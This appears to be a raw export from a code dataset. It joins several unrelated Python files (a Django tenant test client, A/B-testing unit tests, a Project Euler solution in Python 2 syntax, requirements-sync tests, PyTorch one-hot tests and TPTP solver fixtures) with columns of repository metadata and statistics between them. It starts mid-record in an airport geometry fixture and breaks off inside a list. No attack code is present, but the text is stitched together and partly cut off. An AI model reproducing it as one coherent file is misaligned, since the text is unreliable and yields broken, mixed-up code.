-122.212551396454 37.700546791649, -122.212803643385 37.70028160551789, -122.21358679465 37.69954937129089, -122.213712828285 37.69945178216058, -122.2139094695 37.6992977573942, -122.214029664085 37.69926385342248, -122.214167016492 37.69927067686459, -122.215772126242 37.6995422635655, -122.216407235148 37.6996441882836, -122.216730718482 37.6997436962414, -122.21699572149 37.6998624659219, -122.231144277047 37.70987098860599, -122.244036898004 37.71908799328549, -122.249210924546 37.72267501128519, -122.250975485259 37.7240642670484, -122.251198626776 37.72428837020699, -122.251258724068 37.7244648669541, -122.251293129543 37.72490617803489))'), {
u'gnis:county_name': u'Alameda', u'source_ref': u'geonames.usgs.gov', u'iata': u'OAK', u'name:ja': u'\u30aa\u30fc\u30af\u30e9\u30f3\u30c9\u56fd\u969b\u7a7a\u6e2f', u'gnis:feature_type': u'Airport', u'way_area': u'1.54832e+07', u'wikipedia': u'en:Oakland International Airport', u'addr:state': u'CA', u'ele': u'2', u'icao': u'KOAK', u'source': u'openstreetmap.org', u'aeroway': u'aerodrome', u'wikidata': u'Q1165584', u'gnis:created': u'03/01/1994', u'gnis:feature_id': u'1653772', u'aerodrome': u'international', u'name': u'Metropolitan Oakland International Airport'}))
self.assert_has_feature(
13, 1314, 3167, 'pois',
{'kind': 'aerodrome', 'iata': 'OAK'})
| 604.384615
| 7,766
| 0.80826
| 1,849
| 15,714
| 6.852893
| 0.464035
| 0.008523
| 0.006156
| 0.007576
| 0.05485
| 0.034015
| 0.018941
| 0.014837
| 0.011365
| 0.011365
| 0
| 0.760197
| 0.068538
| 15,714
| 25
| 7,767
| 628.56
| 0.105486
| 0.004264
| 0
| 0.125
| 0
| 0.25
| 0.92917
| 0.018794
| 0
| 0
| 0
| 0
| 0.125
| 1
| 0.125
| false
| 0.0625
| 0.1875
| 0
| 0.375
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
b36c1bb7be7c6d9aa8d8387d73d715c1cfbc22b6
| 2,560
|
py
|
Python
|
django_pgschemas/test/client.py
|
randlet/django-pgschemas
|
97c5a059362eae49982c4a219db6fca6bde77b28
|
[
"MIT"
] | null | null | null |
django_pgschemas/test/client.py
|
randlet/django-pgschemas
|
97c5a059362eae49982c4a219db6fca6bde77b28
|
[
"MIT"
] | null | null | null |
django_pgschemas/test/client.py
|
randlet/django-pgschemas
|
97c5a059362eae49982c4a219db6fca6bde77b28
|
[
"MIT"
] | null | null | null |
from django.test import RequestFactory, Client
from ..middleware import TenantMiddleware
class TenantRequestFactory(RequestFactory):
    def __init__(self, tenant, **defaults):
        super().__init__(**defaults)
        self.tenant = tenant

    def get(self, path, data={}, **extra):
        if "HTTP_HOST" not in extra:
            extra["HTTP_HOST"] = self.tenant.get_primary_domain().domain
        return super().get(path, data, **extra)

    def post(self, path, data={}, **extra):
        if "HTTP_HOST" not in extra:
            extra["HTTP_HOST"] = self.tenant.get_primary_domain().domain
        return super().post(path, data, **extra)

    def patch(self, path, data={}, **extra):
        if "HTTP_HOST" not in extra:
            extra["HTTP_HOST"] = self.tenant.get_primary_domain().domain
        return super().patch(path, data, **extra)

    def put(self, path, data={}, **extra):
        if "HTTP_HOST" not in extra:
            extra["HTTP_HOST"] = self.tenant.get_primary_domain().domain
        return super().put(path, data, **extra)

    def delete(self, path, data="", content_type="application/octet-stream", **extra):
        if "HTTP_HOST" not in extra:
            extra["HTTP_HOST"] = self.tenant.get_primary_domain().domain
        return super().delete(path, data, **extra)


class TenantClient(Client):
    def __init__(self, tenant, enforce_csrf_checks=False, **defaults):
        super().__init__(enforce_csrf_checks, **defaults)
        self.tenant = tenant

    def get(self, path, data={}, **extra):
        if "HTTP_HOST" not in extra:
            extra["HTTP_HOST"] = self.tenant.get_primary_domain().domain
        return super().get(path, data, **extra)

    def post(self, path, data={}, **extra):
        if "HTTP_HOST" not in extra:
            extra["HTTP_HOST"] = self.tenant.get_primary_domain().domain
        return super().post(path, data, **extra)

    def patch(self, path, data={}, **extra):
        if "HTTP_HOST" not in extra:
            extra["HTTP_HOST"] = self.tenant.get_primary_domain().domain
        return super().patch(path, data, **extra)

    def put(self, path, data={}, **extra):
        if "HTTP_HOST" not in extra:
            extra["HTTP_HOST"] = self.tenant.get_primary_domain().domain
        return super().put(path, data, **extra)

    def delete(self, path, data="", content_type="application/octet-stream", **extra):
        if "HTTP_HOST" not in extra:
            extra["HTTP_HOST"] = self.tenant.get_primary_domain().domain
        return super().delete(path, data, **extra)
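A small illustrative sketch of the pattern implemented above; the FakeTenant stand-in and host name are invented for the example, and in a real project the tenant would come from the django_pgschemas models. The request itself only resolves inside a configured Django test run.

from django_pgschemas.test.client import TenantClient

class FakeTenant:
    """Anything exposing get_primary_domain().domain satisfies the client."""
    class _Domain:
        domain = "tenant1.example.com"

    def get_primary_domain(self):
        return self._Domain()

# Every request issued by this client carries HTTP_HOST=tenant1.example.com
# unless the caller passes HTTP_HOST explicitly.
client = TenantClient(FakeTenant())
response = client.get("/")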
| 38.787879
| 86
| 0.623047
| 325
| 2,560
| 4.716923
| 0.129231
| 0.104371
| 0.152642
| 0.097847
| 0.840183
| 0.840183
| 0.840183
| 0.840183
| 0.840183
| 0.840183
| 0
| 0
| 0.225781
| 2,560
| 65
| 87
| 39.384615
| 0.773461
| 0
| 0
| 0.84
| 0
| 0
| 0.089063
| 0.01875
| 0
| 0
| 0
| 0
| 0
| 1
| 0.24
| false
| 0
| 0.04
| 0
| 0.52
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
2fcb517cdbf99a8724c86211f3c6e82b1644050e
| 12
|
py
|
Python
|
_draft/answers/x_9_7.py
|
ofl/kuku2
|
7247fb1862d917d23258ebe7a93dca5939433225
|
[
"MIT"
] | null | null | null |
_draft/answers/x_9_7.py
|
ofl/kuku2
|
7247fb1862d917d23258ebe7a93dca5939433225
|
[
"MIT"
] | 1
|
2021-11-13T08:03:04.000Z
|
2021-11-13T08:03:04.000Z
|
_draft/answers/x_9_7.py
|
ofl/kuku2
|
7247fb1862d917d23258ebe7a93dca5939433225
|
[
"MIT"
] | null | null | null |
# x_9_7
#
#
| 3
| 7
| 0.416667
| 3
| 12
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.25
| 0.333333
| 12
| 3
| 8
| 4
| 0.125
| 0.416667
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
2fe8ba30bc37895772df422c85c72258790493e4
| 2,063
|
py
|
Python
|
test/test_means_delta.py
|
quizlet/abracadabra
|
eda599bd02f14b96efdc521f53132d93c9100ede
|
[
"MIT"
] | 24
|
2020-06-12T16:12:32.000Z
|
2021-09-01T12:25:38.000Z
|
test/test_means_delta.py
|
quizlet/abracadabra
|
eda599bd02f14b96efdc521f53132d93c9100ede
|
[
"MIT"
] | 20
|
2020-06-12T06:26:08.000Z
|
2022-03-12T00:57:51.000Z
|
test/test_means_delta.py
|
quizlet/abracadabra
|
eda599bd02f14b96efdc521f53132d93c9100ede
|
[
"MIT"
] | 4
|
2020-06-14T12:14:11.000Z
|
2021-05-28T15:36:44.000Z
|
import pytest
from abra import Experiment, HypothesisTest
def test_means_delta_experiment_t(means_data):
    """Small sample sizes default to t-tests"""
    exp = Experiment(means_data.sample(29), name='means-test')
    test_ab = HypothesisTest(
        metric='metric',
        control='A', variation='A',
        hypothesis='unequal',
        inference_method='means_delta'
    )
    results_ab = exp.run_test(test_ab)
    assert results_ab.test_statistic == 't'


def test_means_delta_experiment_unequal_ab(means_data):
    exp = Experiment(means_data, name='means-test')
    test_ab = HypothesisTest(
        metric='metric',
        control='A', variation='F',
        hypothesis='unequal',
        inference_method='means_delta'
    )
    results_ab = exp.run_test(test_ab)
    assert results_ab.test_statistic == 'z'
    assert results_ab.accept_hypothesis


def test_means_delta_experiment_larger_ab(means_data):
    exp = Experiment(means_data, name='means-test')
    test_ab = HypothesisTest(
        metric='metric',
        control='A', variation='F',
        hypothesis='larger',
        inference_method='means_delta'
    )
    results_ab = exp.run_test(test_ab)
    assert results_ab.test_statistic == 'z'
    assert results_ab.accept_hypothesis


def test_means_delta_experiment_smaller_ab(means_data):
    exp = Experiment(means_data, name='means-test')
    test_ab = HypothesisTest(
        metric='metric',
        control='A', variation='F',
        hypothesis='smaller',
        inference_method='means_delta'
    )
    results_ab = exp.run_test(test_ab)
    assert results_ab.test_statistic == 'z'
    assert not results_ab.accept_hypothesis


def test_means_delta_experiment_aa(means_data):
    exp = Experiment(means_data, name='means-test')
    test_ab = HypothesisTest(
        metric='metric',
        control='A', variation='A',
        hypothesis='larger',
        inference_method='means_delta'
    )
    results_ab = exp.run_test(test_ab)
    assert results_ab.test_statistic == 'z'
    assert not results_ab.accept_hypothesis
| 29.056338
| 62
| 0.68444
| 256
| 2,063
| 5.199219
| 0.160156
| 0.094666
| 0.075131
| 0.063862
| 0.886551
| 0.84598
| 0.84598
| 0.84598
| 0.84598
| 0.825695
| 0
| 0.001222
| 0.206495
| 2,063
| 71
| 63
| 29.056338
| 0.811851
| 0.017935
| 0
| 0.732143
| 0
| 0
| 0.090549
| 0
| 0
| 0
| 0
| 0
| 0.160714
| 1
| 0.089286
| false
| 0
| 0.035714
| 0
| 0.125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2ffdf6f8d222dfa387ff18026c622b2158f54d63
| 3,842
|
py
|
Python
|
python/p002.py
|
tsghosh/eusolutions
|
705fb95f7308105aa4a7f692881200760e55b4f7
|
[
"MIT"
] | null | null | null |
python/p002.py
|
tsghosh/eusolutions
|
705fb95f7308105aa4a7f692881200760e55b4f7
|
[
"MIT"
] | null | null | null |
python/p002.py
|
tsghosh/eusolutions
|
705fb95f7308105aa4a7f692881200760e55b4f7
|
[
"MIT"
] | null | null | null |
# Solution to Project Euler problem 2
# Problem 2
# Each new term in the Fibonacci sequence is generated by adding the previous two terms. By starting with 1 and 2, the first 10 terms will be:
# 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, ...
# By considering the terms in the Fibonacci sequence whose values do not exceed four million, find the sum of the even-valued terms.
#first step is create a sample to find all Fibonacci numbers bellow 10
def find_all_fibonacci_bellow_10():
start_num = 0; ## starts with 0
new_fibonacci_num = 1 ## first add to 1 to start series
new_fibonacci_num = 0 ## starts with 0
print new_fibonacci_num
new_fibonacci_num = 0 + 1
print new_fibonacci_num ## first add to 1 to start series
temp_fibonacci_A = 0
temp_fibonacci_B = 1
while(temp_fibonacci_B + temp_fibonacci_A < 10):
new_fibonacci_num = temp_fibonacci_B + temp_fibonacci_A
temp_fibonacci_A = temp_fibonacci_B
temp_fibonacci_B = new_fibonacci_num
print new_fibonacci_num
# Second step: change the program to add up all Fibonacci numbers below 10.
def find_sum_of_all_fibonacci_below_10():
    total = 0
    temp_fibonacci_a = 0  # the series starts with 0
    temp_fibonacci_b = 1  # the first addition brings the series to 1
    print(temp_fibonacci_a)
    print(temp_fibonacci_b)
    while temp_fibonacci_a + temp_fibonacci_b < 10:
        new_fibonacci_num = temp_fibonacci_a + temp_fibonacci_b
        temp_fibonacci_a = temp_fibonacci_b
        temp_fibonacci_b = new_fibonacci_num
        print(new_fibonacci_num)
        total = total + new_fibonacci_num
    print('Sum of all Fibonacci numbers below 10:', total)
# Third step: add a filter so that only the even Fibonacci numbers below 10 are summed.
def find_sum_of_all_even_fibonacci_below_10():
    total = 0
    temp_fibonacci_a = 0  # the series starts with 0
    temp_fibonacci_b = 1  # the first addition brings the series to 1
    print(temp_fibonacci_a)
    print(temp_fibonacci_b)
    while temp_fibonacci_a + temp_fibonacci_b < 10:
        new_fibonacci_num = temp_fibonacci_a + temp_fibonacci_b
        temp_fibonacci_a = temp_fibonacci_b
        temp_fibonacci_b = new_fibonacci_num
        print(new_fibonacci_num)
        if new_fibonacci_num % 2 == 0:
            total = total + new_fibonacci_num
    print('Sum of all EVEN Fibonacci numbers below 10:', total)
# Final solution: add up all even Fibonacci numbers below 4 million, starting the series with 1 and 2.
def find_sum_of_all_even_fibonacci_below_4_million_start_with_1_and_2():
    temp_fibonacci_a = 1  # the problem statement starts the series with 1 ...
    temp_fibonacci_b = 2  # ... followed by 2
    total = 2  # 2 is even and already in the series, so count it before the loop starts
    # 4 million is 40,00,000 (40 lakhs)
    while temp_fibonacci_a + temp_fibonacci_b < 4000000:
        new_fibonacci_num = temp_fibonacci_a + temp_fibonacci_b
        temp_fibonacci_a = temp_fibonacci_b
        temp_fibonacci_b = new_fibonacci_num
        if new_fibonacci_num % 2 == 0:
            total = total + new_fibonacci_num
    print('Sum of all EVEN Fibonacci numbers below 4 million, starting with 1 and 2:', total)
if __name__ == "__main__":
    # find_all_fibonacci_below_10()
    # find_sum_of_all_fibonacci_below_10()
    # find_sum_of_all_even_fibonacci_below_10()
    find_sum_of_all_even_fibonacci_below_4_million_start_with_1_and_2()
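For comparison, a more compact Python 3 formulation of the same computation; this is not part of the original solution file, just an equivalent sketch of the final function above.
def even_fibonacci_sum(limit=4000000):
    # Walk the series 1, 2, 3, 5, 8, ... and sum the even terms below `limit`.
    a, b = 1, 2
    total = 0
    while a < limit:
        if a % 2 == 0:
            total += a
        a, b = b, a + b
    return total
print(even_fibonacci_sum())  # prints 4613732, the known Project Euler 2 answer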
| 31.235772
| 142
| 0.706663
| 610
| 3,842
| 4.098361
| 0.157377
| 0.1728
| 0.216
| 0.096
| 0.7624
| 0.7396
| 0.714
| 0.6448
| 0.6212
| 0.6076
| 0
| 0.043029
| 0.243883
| 3,842
| 122
| 143
| 31.491803
| 0.817556
| 0.328735
| 0
| 0.784615
| 1
| 0
| 0.055731
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.184615
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ff3b71bc235f8504c2e3290e1fab6abbca8b52c7
| 9,076
|
py
|
Python
|
tests/test_reqsync/driver_test.py
|
alex-ber/PythonPackageSyncTool
|
07b970dd7cb752cb7dfebc9baa06ad0210dfe9c1
|
[
"BSD-2-Clause"
] | null | null | null |
tests/test_reqsync/driver_test.py
|
alex-ber/PythonPackageSyncTool
|
07b970dd7cb752cb7dfebc9baa06ad0210dfe9c1
|
[
"BSD-2-Clause"
] | 2
|
2019-10-22T06:37:48.000Z
|
2019-10-23T10:09:42.000Z
|
tests/test_reqsync/driver_test.py
|
alex-ber/PythonPackageSyncTool
|
07b970dd7cb752cb7dfebc9baa06ad0210dfe9c1
|
[
"BSD-2-Clause"
] | null | null | null |
import logging
logger = logging.getLogger(__name__)
import pytest
from alexber.reqsync import app
from alexber.reqsync.app import logging as app_logging
from contextlib import ExitStack
from importlib.resources import path
from pathlib import Path
import yaml
from .app_test import validate_result
def _calc_removed_lines_lines(config_file):
full_path = Path(config_file).resolve()
with open(full_path) as f:
d = yaml.safe_load(f)
d = d['treeroot']
ret = d['remove']
return ret
@pytest.fixture
def skip_app_logging_reconfiguration(request, mocker):
mocker.patch.object(app_logging.config, 'dictConfig', autospec=True, spec_set=True)
@pytest.mark.it
def test_it_full_single_package(request, mocker, skip_app_logging_reconfiguration):
logger.info(f'{request._pyfuncitem.name}()')
file_manager = ExitStack()
pck = '.'.join(['tests_data', __package__, 'it'])
exp_config_yml = file_manager.enter_context(
path(pck, "config.yml"))
exp_input = file_manager.enter_context(
path(pck, 'requirements-src.txt'))
exp_output= file_manager.enter_context(
path(pck, 'requirements-dest.txt'))
exp_package = 'lxml'
exp_version = '4.3.3'
exp_line = f'{exp_package}=={exp_version}'
argsv = f'--config_file={exp_config_yml} ' \
f'--source={exp_input} ' \
f'--destination={exp_output} ' \
f'--add={exp_package}:{exp_version} ' \
.split()
app.main(argsv)
validate_result(
input_path=exp_input,
output_path=exp_output,
new_lines=[exp_line],
removed_lines=_calc_removed_lines_lines(exp_config_yml))
@pytest.mark.it
def test_it_full_single_package_exist(request, mocker, skip_app_logging_reconfiguration):
logger.info(f'{request._pyfuncitem.name}()')
file_manager = ExitStack()
pck = '.'.join(['tests_data', __package__, 'it'])
exp_config_yml = file_manager.enter_context(
path(pck, "config.yml"))
exp_input = file_manager.enter_context(
path(pck, 'requirements-src.txt'))
exp_output = file_manager.enter_context(
path(pck, 'requirements-dest.txt'))
exp_package = 'numpy'
exp_version = '1.16.2'
argsv = f'--config_file={exp_config_yml} ' \
f'--source={exp_input} ' \
f'--destination={exp_output} ' \
f'--add={exp_package}:{exp_version} ' \
.split()
with pytest.raises(ValueError, match='Mutual_Exclusion'):
app.main(argsv)
@pytest.mark.it
def test_it_full_single_package_as_list(request, mocker, skip_app_logging_reconfiguration):
logger.info(f'{request._pyfuncitem.name}()')
file_manager = ExitStack()
pck = '.'.join(['tests_data', __package__, 'it'])
exp_config_yml = file_manager.enter_context(
path(pck, "config.yml"))
exp_input = file_manager.enter_context(
path(pck, 'requirements-src.txt'))
exp_output = file_manager.enter_context(
path(pck, 'requirements-dest.txt'))
exp_package = 'lxml'
exp_version = '4.3.3'
exp_line = f'{exp_package}=={exp_version}'
argsv = f'--config_file={exp_config_yml} ' \
f'--source={exp_input} ' \
f'--destination={exp_output} ' \
f'--add={exp_package}:{exp_version}, ' \
.split()
app.main(argsv)
validate_result(
input_path=exp_input,
output_path=exp_output,
new_lines=[exp_line],
removed_lines=_calc_removed_lines_lines(exp_config_yml))
@pytest.mark.it
def test_it_full_single_package_exist_as_list(request, mocker, skip_app_logging_reconfiguration):
logger.info(f'{request._pyfuncitem.name}()')
file_manager = ExitStack()
pck = '.'.join(['tests_data', __package__, 'it'])
exp_config_yml = file_manager.enter_context(
path(pck, "config.yml"))
exp_input = file_manager.enter_context(
path(pck, 'requirements-src.txt'))
exp_output = file_manager.enter_context(
path(pck, 'requirements-dest.txt'))
exp_package = 'numpy'
exp_version = '1.16.2'
argsv = f'--config_file={exp_config_yml} ' \
f'--source={exp_input} ' \
f'--destination={exp_output} ' \
f'--add={exp_package}:{exp_version}, ' \
.split()
with pytest.raises(ValueError, match='Mutual_Exclusion'):
app.main(argsv)
@pytest.mark.it
def test_it_full_single_package_last(request, mocker, skip_app_logging_reconfiguration):
logger.info(f'{request._pyfuncitem.name}()')
file_manager = ExitStack()
pck = '.'.join(['tests_data', __package__, 'it'])
exp_config_yml = file_manager.enter_context(
path(pck, "config.yml"))
exp_input = file_manager.enter_context(
path(pck, 'requirements-src.txt'))
exp_output = file_manager.enter_context(
path(pck, 'requirements-dest.txt'))
exp_package = 'zope.interface'
exp_version = '4.6.0'
exp_line = f'{exp_package}=={exp_version}'
argsv = f'--config_file={exp_config_yml} ' \
f'--source={exp_input} ' \
f'--destination={exp_output} ' \
f'--add={exp_package}:{exp_version}, ' \
.split()
app.main(argsv)
validate_result(
input_path=exp_input,
output_path=exp_output,
new_lines=[exp_line],
removed_lines=_calc_removed_lines_lines(exp_config_yml))
@pytest.mark.it
def test_it_full_single_package_first(request, mocker, skip_app_logging_reconfiguration):
logger.info(f'{request._pyfuncitem.name}()')
file_manager = ExitStack()
pck = '.'.join(['tests_data', __package__, 'it'])
exp_config_yml = file_manager.enter_context(
path(pck, "config.yml"))
exp_input = file_manager.enter_context(
path(pck, 'requirements-src.txt'))
exp_output = file_manager.enter_context(
path(pck, 'requirements-dest.txt'))
exp_package = 'aaa'
exp_version = '1.0.0'
exp_line = f'{exp_package}=={exp_version}'
argsv = f'--config_file={exp_config_yml} ' \
f'--source={exp_input} ' \
f'--destination={exp_output} ' \
f'--add={exp_package}:{exp_version}, ' \
.split()
app.main(argsv)
validate_result(
input_path=exp_input,
output_path=exp_output,
new_lines=[exp_line],
removed_lines=_calc_removed_lines_lines(exp_config_yml))
@pytest.mark.it
def test_it_remove_single_package(request, mocker, skip_app_logging_reconfiguration):
logger.info(f'{request._pyfuncitem.name}()')
file_manager = ExitStack()
pck = '.'.join(['tests_data', __package__, 'it'])
exp_config_yml = file_manager.enter_context(
path(pck, "config.yml"))
exp_input = file_manager.enter_context(
path(pck, 'requirements-src.txt'))
exp_output= file_manager.enter_context(
path(pck, 'requirements-dest.txt'))
remove_package = 'numpy'
argsv = f'--config_file={exp_config_yml} ' \
f'--source={exp_input} ' \
f'--destination={exp_output} ' \
f'--remove={remove_package} ' \
.split()
app.main(argsv)
validate_result(
input_path=exp_input,
output_path=exp_output,
removed_lines=[remove_package])
@pytest.mark.it
def test_it_remove_single_package_first(request, mocker, skip_app_logging_reconfiguration):
logger.info(f'{request._pyfuncitem.name}()')
file_manager = ExitStack()
pck = '.'.join(['tests_data', __package__, 'it'])
exp_config_yml = file_manager.enter_context(
path(pck, "config.yml"))
exp_input = file_manager.enter_context(
path(pck, 'requirements-src.txt'))
exp_output= file_manager.enter_context(
path(pck, 'requirements-dest.txt'))
remove_package = 'appdirs'
argsv = f'--config_file={exp_config_yml} ' \
f'--source={exp_input} ' \
f'--destination={exp_output} ' \
f'--remove={remove_package} ' \
.split()
app.main(argsv)
validate_result(
input_path=exp_input,
output_path=exp_output,
removed_lines=[remove_package])
@pytest.mark.it
def test_it_remove_single_package_last(request, mocker, skip_app_logging_reconfiguration):
logger.info(f'{request._pyfuncitem.name}()')
file_manager = ExitStack()
pck = '.'.join(['tests_data', __package__, 'it'])
exp_config_yml = file_manager.enter_context(
path(pck, "config.yml"))
exp_input = file_manager.enter_context(
path(pck, 'requirements-src.txt'))
exp_output= file_manager.enter_context(
path(pck, 'requirements-dest.txt'))
remove_package = 'wstools'
argsv = f'--config_file={exp_config_yml} ' \
f'--source={exp_input} ' \
f'--destination={exp_output} ' \
f'--remove={remove_package} ' \
.split()
app.main(argsv)
validate_result(
input_path=exp_input,
output_path=exp_output,
removed_lines=[remove_package])
if __name__ == "__main__":
pytest.main([__file__])
| 29.089744
| 97
| 0.6526
| 1,132
| 9,076
| 4.85689
| 0.092756
| 0.072026
| 0.078574
| 0.11295
| 0.894689
| 0.894689
| 0.894689
| 0.894689
| 0.894689
| 0.889051
| 0
| 0.00279
| 0.210115
| 9,076
| 311
| 98
| 29.18328
| 0.764123
| 0
| 0
| 0.833333
| 0
| 0
| 0.230023
| 0.14703
| 0
| 0
| 0
| 0
| 0
| 1
| 0.048246
| false
| 0
| 0.039474
| 0
| 0.092105
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ff7d41863b92e53e2dfa54e263003b40ae3a52f4
| 1,601
|
py
|
Python
|
tests/unit/_torch_tests.py
|
acse-yl27218/cherry
|
5b349cae64b282facf5a874164690c06808b1c61
|
[
"Apache-2.0"
] | 160
|
2019-09-14T05:33:29.000Z
|
2022-03-12T18:58:51.000Z
|
tests/unit/_torch_tests.py
|
acse-yl27218/cherry
|
5b349cae64b282facf5a874164690c06808b1c61
|
[
"Apache-2.0"
] | 14
|
2019-12-05T12:14:05.000Z
|
2022-02-28T14:52:52.000Z
|
tests/unit/_torch_tests.py
|
acse-yl27218/cherry
|
5b349cae64b282facf5a874164690c06808b1c61
|
[
"Apache-2.0"
] | 28
|
2019-09-17T02:25:46.000Z
|
2022-03-12T19:53:58.000Z
|
#!/usr/bin/env python3
import unittest
import numpy as np
import torch as th
import cherry as ch
DIM = 5
class TestTorch(unittest.TestCase):
def test_onehot(self):
single = 3
oh_single = ch.onehot(single, dim=DIM)
self.assertTrue(oh_single.size(0) == 1)
self.assertTrue(oh_single.size(1) == DIM)
ref = th.zeros(1, DIM)
ref[0, single] += 1
self.assertTrue((oh_single - ref).pow(2).sum().item() == 0)
single = np.int64(3)
oh_single = ch.onehot(single, dim=DIM)
self.assertTrue(oh_single.size(0) == 1)
self.assertTrue(oh_single.size(1) == DIM)
ref = th.zeros(1, DIM)
ref[0, single] += 1
self.assertTrue((oh_single - ref).pow(2).sum().item() == 0)
single = np.float64(3.0)
oh_single = ch.onehot(single, dim=DIM)
self.assertTrue(oh_single.size(0) == 1)
self.assertTrue(oh_single.size(1) == DIM)
ref = th.zeros(1, DIM)
ref[0, int(single)] += 1
self.assertTrue((oh_single - ref).pow(2).sum().item() == 0)
single = np.float64(3.2)
oh_single = ch.onehot(single, dim=DIM)
self.assertTrue(oh_single.size(0) == 1)
self.assertTrue(oh_single.size(1) == DIM)
ref = th.zeros(1, DIM)
ref[0, int(single)] += 1
self.assertTrue((oh_single - ref).pow(2).sum().item() == 0)
multi = th.arange(DIM)
multi = ch.onehot(multi, dim=DIM)
ref = th.eye(DIM)
self.assertTrue((multi - ref).pow(2).sum().item() == 0)
if __name__ == '__main__':
unittest.main()
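The assertions above pin down the behaviour expected of ch.onehot: a scalar index (Python int, numpy int, or a float that gets truncated) yields a 1 x DIM row with a single one, and a vector of indices yields an identity-like matrix. A minimal sketch of a helper with that behaviour, purely illustrative and not cherry's actual implementation:
import torch as th
def onehot_sketch(x, dim):
    # Accept Python/numpy scalars or a 1-D tensor of indices; floats are truncated.
    if not th.is_tensor(x):
        x = th.tensor([float(x)])
    idx = x.long().view(-1)
    out = th.zeros(idx.numel(), dim)
    out[th.arange(idx.numel()), idx] = 1.0
    return out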
| 29.648148
| 67
| 0.569644
| 234
| 1,601
| 3.790598
| 0.188034
| 0.144307
| 0.21646
| 0.297632
| 0.738444
| 0.738444
| 0.721533
| 0.721533
| 0.721533
| 0.721533
| 0
| 0.040712
| 0.263585
| 1,601
| 53
| 68
| 30.207547
| 0.71162
| 0.013117
| 0
| 0.585366
| 0
| 0
| 0.005067
| 0
| 0
| 0
| 0
| 0
| 0.317073
| 1
| 0.02439
| false
| 0
| 0.097561
| 0
| 0.146341
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ff902fa35b76847bda8ee530088291407769dfaf
| 2,054
|
py
|
Python
|
tptp/frontend/plots/dummyResults.py
|
leoprover/tptp
|
a670c903bd81990a59ffa7ec19cc0666dd3b5c55
|
[
"BSD-3-Clause"
] | 6
|
2019-08-15T13:12:13.000Z
|
2021-08-09T12:07:51.000Z
|
tptp/frontend/plots/dummyResults.py
|
leoprover/tptp
|
a670c903bd81990a59ffa7ec19cc0666dd3b5c55
|
[
"BSD-3-Clause"
] | null | null | null |
tptp/frontend/plots/dummyResults.py
|
leoprover/tptp
|
a670c903bd81990a59ffa7ec19cc0666dd3b5c55
|
[
"BSD-3-Clause"
] | null | null | null |
from tptp.core import SZSStatus
from ...core import szs, ProblemWithStatus
from ...reasoning.localSolver import LocalSolverCall, LocalSolver
from ...reasoning import SolverResult, Solver
dummyResults = [
SolverResult(LocalSolverCall(ProblemWithStatus(None, None, None, SZSStatus.THM), solver=LocalSolver('leo', command=None),
timeout=None), SZSStatus.THM, 20.0, 30.0),
SolverResult(LocalSolverCall(ProblemWithStatus(None, None, None, SZSStatus.THM), solver=LocalSolver('leo', command=None),
timeout=None), SZSStatus.THM, 20.0, 30.0),
SolverResult(LocalSolverCall(ProblemWithStatus(None, None, None, SZSStatus.TMO), solver=LocalSolver('leo', command=None),
timeout=None), SZSStatus.THM, 20.0, 30.0),
SolverResult(LocalSolverCall(ProblemWithStatus(None, None, None, SZSStatus.TMO), solver=LocalSolver('satallax', command=None),
timeout=None), SZSStatus.THM, 20.0, 30.0),
SolverResult(LocalSolverCall(ProblemWithStatus(None, None, None, SZSStatus.TMO), solver=LocalSolver('satallax', command=None),
timeout=None), SZSStatus.THM, 20.0, 30.0),
SolverResult(LocalSolverCall(ProblemWithStatus(None, None, None, SZSStatus.THM), solver=LocalSolver('satallax', command=None),
timeout=None), SZSStatus.THM, 20.0, 30.0),
SolverResult(LocalSolverCall(ProblemWithStatus(None, None, None, SZSStatus.THM), solver=LocalSolver('satallax', command=None),
timeout=None), SZSStatus.THM, 20.0, 30.0),
SolverResult(LocalSolverCall(ProblemWithStatus(None, None, None, SZSStatus.THM), solver=LocalSolver('satallax', command=None),
timeout=None), SZSStatus.THM, 20.0, 30.0),
